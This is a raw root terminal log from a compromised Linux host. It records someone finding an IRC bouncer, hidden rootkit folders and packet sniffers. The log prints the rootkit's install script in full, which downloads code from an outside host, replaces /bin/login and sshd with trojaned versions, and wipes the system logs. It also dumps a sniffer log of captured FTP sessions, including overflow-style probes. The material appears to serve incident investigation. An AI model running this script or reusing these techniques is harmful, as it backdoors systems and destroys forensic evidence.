�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost 69� �� �6668
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
:Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.2.2
^]q
Connection closed.
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost 4108
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost 4120
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost 6010
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
^]q
Connection closed.
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# pico /etc/smbd� �� �� �� �� �samba/smbd.conf
pico: error while loading shared libraries: libncurses.so.4: cannot load shared object file: No such file or directory
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# locate smbd.conf
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# slocate
Secure Locate 2.5 - Released December 30, 2000
Copyright (c) 1999, 2000 Kevin Lindsay & Netnation Communications Inc. &
James A. Woods
search usage: slocate [-qi] [-d ] [--database=] ...
slocate [-r ] [--regexp=]
database usage: slocate [-qv] [-o ] [--output=]
slocate [-e ] [-f ] [-l ]
[-c] <[-U ] [-u]>
general usage: slocate [-Vh] [--version] [--help]
Options:
-u - Create slocate database starting at path /.
-U - Create slocate database starting at path .
-c - Parse original GNU Locate's '/etc/updatedb.conf'
when using the -u or -U options. If 'updatedb' is
symbolically linked to the 'slocate' binary, the
original configuration file will automatically be
used.
-e - Exclude directories from the slocate database when
using the -u or -U options.
-f - Exclude file system types from the slocate database
when using the -u or -U options. (ie. NFS, etc).
-l - Security level.
0 turns security checks off. This will make
searchs faster.
1 turns security checks on. This is the default.
-q - Quiet mode. Error messages are suppressed.
-n - Limit the amount of results shown to .
-i - Does a case insensitive search.
-r
--regexp= - Search the database using a basic POSIX regular
expression.
-o
--output= - Specfies the database to create.
-d
--database= - Specfies the path of databases to search in.
-h
--help - Display this help.
-v
--verbose - Verbose mode. Display files when creating database.
-V
--version - Display version.
Author: Kevin Lindsay
Bugs: klindsay@mkintraweb.com
FTP: ftp://ftp.geekreview.org/slocate/
ftp://ftp.mkintraweb.com/pub/linux/slocate/
HTTP: http://www.geekreview.org/slocate/
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# updatedb
/usr/bin/updatedb: frcode: command not found
find: /proc/17100/fd: No such file or directory
find: /proc/21382: No such file or directory
find: /proc/21384: No such file or directory
find: /proc/21383/fd/18: No such file or directory
find: /proc/21383/fd/18: No such file or directory
updatedb: new database would be empty
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# find
.
./rpcinfo
./zdump
./zic
./glibc_post_upgrade
./dip
./diplogin
./mklost+found
./arping
./clockdiff
./ping6
./rdisc
./tracepath
./tracepath6
./traceroute6
./atd
./atrun
./makewhatis
./logrotate
./rwhod
./adduser
./chpasswd
./groupadd
./groupdel
./groupmod
./grpck
./grpconv
./grpunconv
./newusers
./pwck
./pwconv
./pwunconv
./useradd
./userdel
./usermod
./nscd
./kbdconfig
./ntsysv
./setup
./safe_finger
./tcpd
./try-from
./mouseconfig
./tmpwatch
./traceroute
./utempter
./mkdict
./packer
./authconfig
./sasldblistusers
./saslpasswd
./gpm
./kudzu
./module_upgrade
./updfstab
./chat
./pppd
./pppdump
./pppstats
./chroot
./checkpc
./lpc
./lpd
./monitor
./automount
./mailstats
./makemap
./praliases
./sendmail
./smrsh
./glidelink
./gnome-pty-helper
./rhn_register
./rhn_check
./rhnsd
./up2date
./cfdisk
./ramsize
./rdev
./readprofile
./rootflags
./swapdev
./tunelp
./vidmode
./vigr
./vipw
./sys-unconfig
./usernetctl
./apmd
./actctrl
./avmcapictrl
./capiinit
./divertctrl
./hisaxctrl
./ibod
./icnctrl
./imon
./imontty
./ipppd
./ipppstats
./iprofd
./isdnctrl
./isdnlog
./loopctrl
./mkzonedb
./pcbitctl
./rcapid
./vboxd
./vboxgetty
./vboxputty
./lokkit
./idecrypt
./identd
./ikeygen
./in.identd
./pmap_dump
./pmap_set
./exportfs
./nfsstat
./nhfsstone
./rpc.mountd
./rpc.nfsd
./showmount
./netconfig
./edquota
./quotastats
./repquota
./rpc.rquotad
./setquota
./adsl-connect
./adsl-setup
./adsl-start
./adsl-status
./adsl-stop
./pppoe
./pppoe-server
./pppoe-sniff
./sndconfig
./setclock
./timeconfig
./crond
./anacron
./chkfontpath
./printconf-backend
./yppoll
./ypset
./sshd
./in.rexecd
./in.rlogind
./in.rshd
./rpc.rstatd
./rpc.rusersd
./rpc.rwalld
./inetdconvert
./xinetd
./in.fingerd
./in.ntalkd
./in.talkd
./in.telnetd
./rpc.yppasswdd
./rpc.ypxfrd
./yppush
./ypserv
./ncpserv
./nwbind
./nwclient
./nwconn
./nwserv
./nwmsg
./ckconfig
./ftprestart
./ftpshut
./in.ftpd
./in.wuftpd
./privatepw
./wu.ftpd
./xferstats
./ab
./httpd
./logresolve
./rotatelogs
./suexec
./tux
./tux2w3c
./dns-keygen
./dnssec-keygen
./dnssec-makekeyset
./dnssec-signkey
./dnssec-signzone
./named
./lwresd
./named-bootconf
./named-checkconf
./named-checkzone
./rndc
./rdistd
./tcpdump
./snmpd
./snmptrapd
./arpsnmp
./arpwatch
./rtacct
./lsof
./visudo
./gated
./gdc
./ospf_monitor
./ripquery
./imapd
./ipop2d
./ipop3d
./ntpd
./ntpdate
./ntpdc
./ntpq
./ntptime
./ntptimeset
./ntptrace
./tickadj
./fax500
./go500
./go500gw
./in.xfingerd
./mail500
./maildap
./rcpt500
./rp500
./slapadd
./slapcat
./slapd
./slapindex
./slappasswd
./slurpd
./xrpcomp
./ldbmcat
./stunnel
./nmbd
./samba
./smbd
./in.mtftpd
./pxe
./rarpd
./routed
./client
./squid
./in.tftpd
./nfsd
./.sshd.bak
./sshd.orig
./mysqld
./sock
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# find \� �/ |grep .sniffer
find: /proc/17100/fd: No such file or directory
/rk/linsniffer
/dev/ida/.inet/linsniffer
/dev/.../ /rk/linsniffer
/usr/bin/.tux/tools/sniffer
/usr/bin/.tux/tools/sniffer/sniffchk
/usr/bin/.tux/tools/sniffer/ADMsniff
/usr/bin/.tux/tools/sniffer/write
/usr/bin/.tux/tools/sniffer/read
/usr/bin/.tux/tools/sniffer/tcp.log
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# cd /dev/"..."/" "/
�]0;@pc11: /dev/.../ �[root@pc11 ]# ls
�[01;34mrk�[00m �[01;31mtzap.tgz�[00m
�]0;@pc11: /dev/.../ �[root@pc11 ]# cd rk
�]0;@pc11: /dev/.../ /rk�[root@pc11 rk]# ls
�[01;32matd.init�[00m �[01;32mfunctions�[00m �[01;32mlogin�[00m �[01;32mps�[00m �[01;32mtop�[00m
�[01;32mchsh�[00m �[01;32minet�[00m �[01;32mls�[00m �[01;32mpstree�[00m �[01;34mutils�[00m
�[01;32mclean�[00m �[01;32minstall�[00m �[01;32mmd5bd�[00m �[01;32msense�[00m �[01;32mvdir�[00m
�[00mcrontab-entry�[00m �[00minstall.log�[00m �[01;32mnetstat�[00m �[01;32msysinfo�[00m �[01;32mxinetd�[00m
�[01;32mdu�[00m �[01;32mkillall�[00m �[01;32morg�[00m �[01;32msyslogd�[00m
�[01;32mfind�[00m �[01;32mlinsniffer�[00m �[01;32mpatch�[00m �[01;32msyslogd.init�[00m
�]0;@pc11: /dev/.../ /rk�[root@pc11 rk]# cat patch |less
�[?1048h�[?1047h�[?1h�=�[24;1H�[K#!/bin/sh
wget www.aht.sh/telnetd.c
chattr -aisu /bin/login
cp -f /bin/login /bin/.login
gcc -o login telnetd.c
cp -f login /bin/
chattr +iaus /bin/login
rm -rf telnetd.c
cd /var/log
rm -rf *
echo anonymous >/etc/ftpusers
cd /usr/sbin
rm -rf rpc.*
killall -9 rpc.statd
killall -9 portmap
killall -9 lpd
chattr -iaus /usr/sbin/sshd
cp -f /usr/sbin/nfsd /usr/sbin/sshd
chattr +iaus /usr/sbin/sshd
chattr -iaus /usr/local/bin/sshd
cp -f /usr/sbin/nfsd /usr/local/bin/sshd
chattr +iasu /usr/local/bin/sshd
killall -HUP sshd
�[24;1H�[K:�[24;1H�[24;1H�[K
�[24;1H�[K:�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[24;1H�[K��[24;1H�[K�[7m(END) �[27m�[24;1H�[K�[?1l�>�[?1047l�[?1048l�]0;@pc11: /dev/.../ /rk�[root@pc11 rk]# ls
�[01;32matd.init�[00m �[01;32mfunctions�[00m �[01;32mlogin�[00m �[01;32mps�[00m �[01;32mtop�[00m
�[01;32mchsh�[00m �[01;32minet�[00m �[01;32mls�[00m �[01;32mpstree�[00m �[01;34mutils�[00m
�[01;32mclean�[00m �[01;32minstall�[00m �[01;32mmd5bd�[00m �[01;32msense�[00m �[01;32mvdir�[00m
�[00mcrontab-entry�[00m �[00minstall.log�[00m �[01;32mnetstat�[00m �[01;32msysinfo�[00m �[01;32mxinetd�[00m
�[01;32mdu�[00m �[01;32mkillall�[00m �[01;32morg�[00m �[01;32msyslogd�[00m
�[01;32mfind�[00m �[01;32mlinsniffer�[00m �[01;32mpatch�[00m �[01;32msyslogd.init�[00m
�]0;@pc11: /dev/.../ /rk�[root@pc11 rk]# cd /usr/bin/.tux/tools/sniffer/
�]0;@pc11: /usr/bin/.tux/tools/sniffer�[root@pc11 sniffer]# ls
�[01;32mADMsniff�[00m �[01;32mread�[00m �[01;32msniffchk�[00m �[01;32mwrite�[00m
�]0;@pc11: /usr/bin/.tux/tools/sniffer�[root@pc11 sniffer]# ./read
Usage: ./read [-zd] inputFile
-z Read from stdin (disables uniq, sort, header/footer etc!)
-d Don't "guess" telnet passwords
�]0;@pc11: /usr/bin/.tux/tools/sniffer�[root@pc11 sniffer]# cat tcp.log
----- [FIN]
218.20.249.192 => pc11 [23]
----- [FIN]
218.20.249.192 => pc11 [23]
----- [RST]
iest26.ie.cuhk.edu.hk => pc11 [21]
----- [RST]
iest26.ie.cuhk.edu.hk => pc11 [21]
USER anonymous
USER anonymous
PASS abc@abc.om
PASS abc@abc.om
PORT 137,189,96,26,200,151
PORT 137,189,96,26,200,151
LIST
LIST
CWD upload
CWD upload
PORT 137,189,96,26,200,152
PORT 137,189,96,26,200,152
LIST
LIST
QUIT
QUIT
gateway => pc11 [143]
OO
gateway => pc11 [143]
OO
----- [RST]
gateway => pc11 [110]
O
----- [RST]
gateway => pc11 [110]
O
----- [Timed Out]
proxyscan.undernet.org => pc11 [23]
P(P(#>
----- [Timed Out]
proxyscan.undernet.org => pc11 [23]
P(P(#>P)\#P)\#
----- [FIN]
host10-127.pool80117.interbusiness.it => pc11 [21]
----- [FIN]
host10-127.pool80117.interbusiness.it => pc11 [21]
USER anonymous
USER anonymous
PASS Hgpuser@home.com
PASS Hgpuser@home.com
CWD /pub/
CWD /pub/
MKD 030207184022p
MKD 030207184022p
CWD /public/
CWD /public/
CWD /pub/incoming/
CWD /pub/incoming/
CWD /incoming/
CWD /incoming/
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /
CWD /
MKD 030207184024p
MKD 030207184024p
CWD /upload/
CWD /upload/
MKD 030207184025p
MKD 030207184025p
RMD 030207184025p
RMD 030207184025p
SYST
SYST
REST 1
REST 1
PASV
PASV
PORT 207,46,133,140,1,21
PORT 207,46,133,140,1,21
CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppCWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppp
----- [CAPLEN Exceeded]
AGrenoble-101-1-6-38.abo.wanadoo.fr => pc11 [21]
----- [CAPLEN Exceeded]
AGrenoble-101-1-6-38.abo.wanadoo.fr => pc11 [21]
----- [FIN]
204.252.237.15 => pc11 [21]
----- [FIN]
204.252.237.15 => pc11 [21]
:t:t
----- [FIN]
204.252.237.15 => pc11 [106]
----- [FIN]
204.252.237.15 => pc11 [106]
----- [Timed Out]
Exiting...
Exiting...
f06a-2-22.d1.club-internet.fr => pc11 [21]
f06a-2-22.d1.club-internet.fr => pc11 [21]
USER anonymous
USER anonymous
PASS Egpuser@home.com
PASS Egpuser@home.com
----- [FIN]
202.116.191.200 => pc11 [23]
----- [FIN]
202.116.191.200 => pc11 [23]
----- [FIN]
userdc172.dsl.pipex.com => pc11 [21]
----- [FIN]
userdc172.dsl.pipex.com => pc11 [21]
user anonymous
user anonymous
pass sunw@www.com
pass sunw@www.com
QUIT
fQUIT
f
----- [FIN]
210.31.6.59 => pc11 [21]
----- [FIN]
210.31.6.59 => pc11 [21]
----- [FIN]
210.31.6.59 => pc11 [21]
----- [FIN]
210.31.6.59 => pc11 [21]
----- [Timed Out]
203.161.226.173 => pc11 [23]
----- [Timed Out]
203.161.226.173 => pc11 [23]
----- [FIN]
203.161.226.173 => pc11 [23]
----- [FIN]
203.161.226.173 => pc11 [23]
#'$ #'$ANSIANSI"!"!
----- [FIN]
userdc172.dsl.pipex.com => pc11 [21]
----- [FIN]
userdc172.dsl.pipex.com => pc11 [21]
USER anonymous
USER anonymous
PASS Qgpuser@home.com
PASS Qgpuser@home.com
CWD /pub/
CWD /pub/
MKD 030524101230p
MKD 030524101230p
CWD /public/
CWD /public/
CWD /pub/incoming/
CWD /pub/incoming/
CWD /incoming/
CWD /incoming/
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /
CWD /
MKD 030524101233p
MKD 030524101233p
CWD /upload/
CWD /upload/
MKD 030524101234p
MKD 030524101234p
RMD 030524101234p
RMD 030524101234p
SYST
SYST
REST 1
REST 1
PASV
PASV
PORT 207,46,133,140,1,21
PORT 207,46,133,140,1,21
CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppCWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppp
----- [CAPLEN Exceeded]
userdc172.dsl.pipex.com => pc11 [21]
----- [CAPLEN Exceeded]
userdc172.dsl.pipex.com => pc11 [21]
USER anonymous
USER anonymous
PASS anonymous
PASS anonymous
PWD
PWD
PASV
PASV
----- [Timed Out]
f04v-10-152.d1.club-internet.fr => pc11 [21]
----- [Timed Out]
f04v-10-152.d1.club-internet.fr => pc11 [21]
USER anonymous
USER anonymous
PASS Pgpuser@home.com
PASS Pgpuser@home.com
CWD /pub/
CWD /pub/
MKD 030524134855p
MKD 030524134855p
CWD /public/
CWD /public/
CWD /pub/incoming/
CWD /pub/incoming/
CWD /incoming/
CWD /incoming/
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /
CWD /
MKD 030524134857p
MKD 030524134857p
CWD /upload/
CWD /upload/
MKD 030524134858p
MKD 030524134858p
RMD 030524134858p
RMD 030524134858p
SYST
SYST
REST 1
REST 1
PASV
PASV
PORT 207,46,133,140,1,21
PORT 207,46,133,140,1,21
CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppCWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppp
----- [CAPLEN Exceeded]
f04v-10-152.d1.club-internet.fr => pc11 [21]
----- [CAPLEN Exceeded]
f04v-10-152.d1.club-internet.fr => pc11 [21]
USER anonymous
USER anonymous
PASS Vgpuser@home.com
PASS Vgpuser@home.com
CWD /upload/
CWD /upload/
DELE /upload/1mbtest.ptf
DELE /upload/1mbtest.ptf
TYPE I
TYPE I
PORT 212,194,69,152,9,67
PORT 212,194,69,152,9,67
STOR /upload/1mbtest.ptf
STOR /upload/1mbtest.ptf
----- [FIN]
p5083D6A0.dip.t-dialin.net => pc11 [21]
----- [FIN]
p5083D6A0.dip.t-dialin.net => pc11 [21]
USER anonymous
USER anonymous
PASS Kgpuser@home.com
PASS Kgpuser@home.com
CWD /pub/
CWD /pub/
MKD 010525180350p
MKD 010525180350p
CWD /public/
CWD /public/
CWD /pub/incoming/
CWD /pub/incoming/
CWD /incoming/
CWD /incoming/
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /
CWD /
MKD 010525180352p
MKD 010525180352p
CWD /upload/
CWD /upload/
MKD 010525180353p
MKD 010525180353p
RMD 010525180353p
RMD 010525180353p
SYST
SYST
REST 1
REST 1
PASV
PASV
PORT 80,131,214,160,1,21
PORT 80,131,214,160,1,21
----- [FIN]
pD9EB3E80.dip.t-dialin.net => pc11 [21]
----- [FIN]
pD9EB3E80.dip.t-dialin.net => pc11 [21]
----- [Timed Out]
p5083D6A0.dip.t-dialin.net => pc11 [21]
----- [Timed Out]
p5083D6A0.dip.t-dialin.net => pc11 [21]
USER anonymous
USER anonymous
PASS tagger@aol.com
PASS tagger@aol.com
TYPE A
TYPE A
PORT 80,131,214,160,17,125
PORT 80,131,214,160,17,125
LIST
LIST
----- [Timed Out]
RAS31-140.UNI-MUENSTER.DE => pc11 [23]
----- [Timed Out]
RAS31-140.UNI-MUENSTER.DE => pc11 [23]
----- [RST]
ARouen-106-1-3-189.w217-128.abo.wanadoo.fr => pc11 [21]
----- [RST]
ARouen-106-1-3-189.w217-128.abo.wanadoo.fr => pc11 [21]
----- [Timed Out]
218.92.227.37 => pc11 [21]
----- [Timed Out]
218.92.227.37 => pc11 [21]
GET http://www.spedia.net/sp_login.htm HTTP/1.1
Host: www.spedia.net
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Win2000)
GET http://www.spedia.net/sp_login.htm HTTP/1.1
Host: www.spedia.net
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Win2000)
----- [RST]
lns-th2-1-82-64-0-249.adsl.proxad.net => pc11 [21]
----- [RST]
lns-th2-1-82-64-0-249.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS Qgpuser@home.com
PASS Qgpuser@home.com
----- [FIN]
lns-th2-1-82-64-0-249.adsl.proxad.net => pc11 [21]
----- [FIN]
lns-th2-1-82-64-0-249.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS Kgpuser@home.com
PASS Kgpuser@home.com
CWD /pub/
CWD /pub/
MKD 030525151652p
MKD 030525151652p
CWD /public/
CWD /public/
CWD /pub/incoming/
CWD /pub/incoming/
CWD /incoming/
CWD /incoming/
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /home/
CWD /home/
CWD /Temp/
CWD /Temp/
CWD /wwwroot/
CWD /wwwroot/
CWD /cgi-bin/
CWD /cgi-bin/
CWD /cgibin/
CWD /cgibin/
CWD /in/
CWD /in/
CWD /_vti_cnf/
CWD /_vti_cnf/
CWD /_vti_txt/
CWD /_vti_txt/
CWD /_vti_log/
CWD /_vti_log/
CWD /anonymous/
CWD /anonymous/
CWD /outgoing/
CWD /outgoing/
CWD /tmp/
CWD /tmp/
CWD /mailroot/
CWD /mailroot/
CWD /ftpproot/
CWD /ftpproot/
CWD /images/
CWD /images/
CWD /_private/
CWD /_private/
----- [Timed Out]
203.228.148.3 => pc11 [21]
mhm~4R
----- [Timed Out]
203.228.148.3 => pc11 [21]
mhm~4Rm4m4
----- [Timed Out]
203.228.148.3 => pc11 [21]
n`tn`4V
----- [Timed Out]
203.228.148.3 => pc11 [21]
n`tn`4V
----- [FIN]
218.93.10.162 => pc11 [21]
----- [FIN]
218.93.10.162 => pc11 [21]
----- [RST]
172.189.148.158 => pc11 [21]
P
----- [RST]
172.189.148.158 => pc11 [21]
P
----- [FIN]
80.134.125.39 => pc11 [21]
----- [FIN]
80.134.125.39 => pc11 [21]
202.115.50.26 => pc11 [21]
202.115.50.26 => pc11 [21]
USER anonymous@ftp.microsoft.com
USER anonymous@ftp.microsoft.com
PASS abc@126.com
PASS abc@126.com
----- [RST]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
----- [RST]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS Ggpuser@home.com
PASS Ggpuser@home.com
----- [FIN]
218.92.227.24 => pc11 [21]
----- [FIN]
218.92.227.24 => pc11 [21]
GET http://www.spedia.net/sp_login.htm HTTP/1.1
Host: www.spedia.net
Accept: */*
Pragma: no-cache
